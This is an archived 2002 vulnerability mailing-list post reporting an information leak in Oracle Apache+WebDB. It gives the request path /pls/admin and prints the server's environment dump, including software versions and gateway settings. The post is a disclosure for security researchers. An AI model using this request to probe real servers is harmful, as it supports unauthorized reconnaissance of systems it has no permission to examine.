Vulnerability Development mailing list archives
Correction - Oracle Apache+WebDB info leakege
From: "Leandro Malaquias" <wazup () brnet com br>
Date: Sun, 3 Feb 2002 23:37:31 -0200
While I was going through the Oracle Apache+WebDB vulnerability, I found something else also interesting, I don't know if anyone has posted this before, but here it goes any way. If you reques the following: http://<hostname>:<port>/pls/admin The following info is displayed: Sun, 3 Feb 2002 19:57:12 GMT No DAD configuration Found DAD name: PROCEDURE : URL : http://<hostname>:<port>/pls/admin PARAMETERS : =========== ENVIRONMENT: ============ PLSQL_GATEWAY=WebDb GATEWAY_IVERSION=2 SERVER_SOFTWARE=Apache/1.3.12 (Unix) ApacheJServ/1.1 mod_perl/1.22 GATEWAY_INTERFACE=CGI/1.1 SERVER_PORT= <port number> SERVER_NAME= <hostname> REQUEST_METHOD=GET QUERY_STRING= PATH_INFO=/admin SCRIPT_NAME=/pls REMOTE_HOST= REMOTE_ADDR= <My IP> SERVER_PROTOCOL=HTTP/1.1 REQUEST_PROTOCOL=HTTP REMOTE_USER= HTTP_CONTENT_LENGTH= HTTP_CONTENT_TYPE= HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) HTTP_HOST=<hostname:<port> HTTP_ACCEPT=image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-quickviewplus, */* HTTP_ACCEPT_ENCODING=gzip, deflate HTTP_ACCEPT_LANGUAGE=en-us HTTP_ACCEPT_CHARSET= HTTP_COOKIE= Authorization= HTTP_IF_MODIFIED_SINCE= Peace, Leandro Malaquias Consultor de Segurança em Redes Network Security Consultant
Current thread:
- Correction - Oracle Apache+WebDB info leakege Leandro Malaquias (Feb 03)
- <Possible follow-ups>
- Re: Correction - Oracle Apache+WebDB info leakege Scalise, Marzio (Feb 04)